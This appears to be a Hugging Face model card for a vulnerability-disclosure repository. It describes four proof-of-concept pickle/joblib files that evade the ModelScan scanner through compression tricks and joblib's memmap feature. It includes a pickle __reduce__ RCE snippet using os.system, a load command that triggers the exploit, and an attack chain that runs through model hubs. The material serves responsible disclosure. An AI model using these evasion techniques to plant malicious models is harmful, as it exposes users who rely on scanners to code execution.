YAML Metadata Warning: empty or missing yaml metadata in repo card (https://huggingface.co/docs/hub/model-cards#model-card-metadata)

ModelScan Bypass Research

Security Research - Do Not Use in Production

Overview

This repository contains proof-of-concept files demonstrating bypass techniques for ModelScan, a popular ML model security scanner. These techniques allow malicious pickle-based model files to evade detection.

Files

1. exploit_compression_mismatch.joblib.gz

  • Technique: Compression method mismatch
  • Description: File extension indicates gzip (.gz) but content is BZ2 compressed
  • ModelScan Result: SKIPPED - Scanner did not analyze this file
  • Impact: RCE triggers during joblib.load()

2. exploit_double_compression.joblib.gz.bz2

  • Technique: Nested/double compression
  • Description: Payload compressed twice (gzip then bz2)
  • ModelScan Result: SKIPPED - Scanner did not analyze this file
  • Impact: RCE triggers during joblib.load()

3. exploit_corrupt_header.joblib.gz

  • Technique: Malformed compression header
  • Description: Gzip file with corrupted header (first byte modified to 0x00)
  • ModelScan Result: SKIPPED - Scanner did not analyze this file
  • Impact: RCE triggers during joblib.load()

4. exploit_memmap_bypass.joblib ⭐ PRIMARY FINDING

  • Technique: Memory-mapped array bypass
  • Description: Uses joblib's memmap feature with malicious __reduce__ method
  • ModelScan Result: SCANNED but found NO ISSUES ✅
  • Impact: RCE triggers during joblib.load()
  • Significance: This is a TRUE bypass - scanner analyzed the file but missed the RCE

Reproduction Steps

Testing with ModelScan

# Install ModelScan
pip install modelscan

# Test each exploit
modelscan scan -p exploit_compression_mismatch.joblib.gz
modelscan scan -p exploit_double_compression.joblib.gz.bz2
modelscan scan -p exploit_corrupt_header.joblib.gz
modelscan scan -p exploit_memmap_bypass.joblib

Expected Results

  • Files 1-3: ModelScan will skip these files (not analyzed)
  • File 4: ModelScan will scan but report "No issues found! 🎉" ⚠️

Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION)

import joblib

# This will execute arbitrary code!
model = joblib.load('exploit_memmap_bypass.joblib')

Technical Details

How the Bypass Works

All four exploits use Python's pickle __reduce__ method for RCE:

def __reduce__(self):
    import os
    return (os.system, ('malicious_command',))

The vulnerability: ModelScan should detect this pattern but fails when:

  1. Compression methods don't match file extensions
  2. Files are double-compressed
  3. Compression headers are malformed
  4. Files use joblib's memmap feature

Why This Matters

  • Users trust ModelScan to detect malicious models
  • These bypass techniques allow attackers to evade detection
  • Malicious models could be uploaded to model hubs undetected

Security Impact

Severity: HIGH

Attack Vector:

  1. Attacker creates malicious model using one of these techniques
  2. Uploads to model hub (HuggingFace, etc.)
  3. Victim downloads and scans with ModelScan
  4. Scanner reports "No issues found!"
  5. Victim loads model → RCE

Disclosure

This research is being submitted to Huntr's bug bounty program for responsible disclosure.

Date: December 25, 2024 Researcher: Security Research Team

References

Disclaimer

⚠️ For Security Research Only

These files are provided for security research and vulnerability disclosure purposes only. Do not use these techniques for malicious purposes. Loading these files will execute code.


Status: Under responsible disclosure to Huntr bug bounty program

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support